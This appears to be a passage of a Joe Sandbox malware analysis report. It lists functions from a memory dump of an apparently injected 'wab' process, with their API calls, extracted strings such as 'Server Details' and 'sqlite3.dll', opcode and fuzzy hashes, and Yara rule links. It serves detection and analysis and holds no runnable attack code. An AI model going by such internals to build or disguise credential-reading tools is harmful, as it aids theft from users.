                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                      • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                      • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408DE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                      • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                      • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                      • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                                      • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406E81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                        • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                        • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                      • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                                      • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004033A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                      • String ID: 34@$Server Details
                                                                                                                                                                                                                      • API String ID: 1096422788-1041202369
                                                                                                                                                                                                                      • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                                      • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042BE74 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                                      • Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004081FD Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                                                                                      • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                                      • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00415B07 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      • Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                                      • Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004096FB Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                                      • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%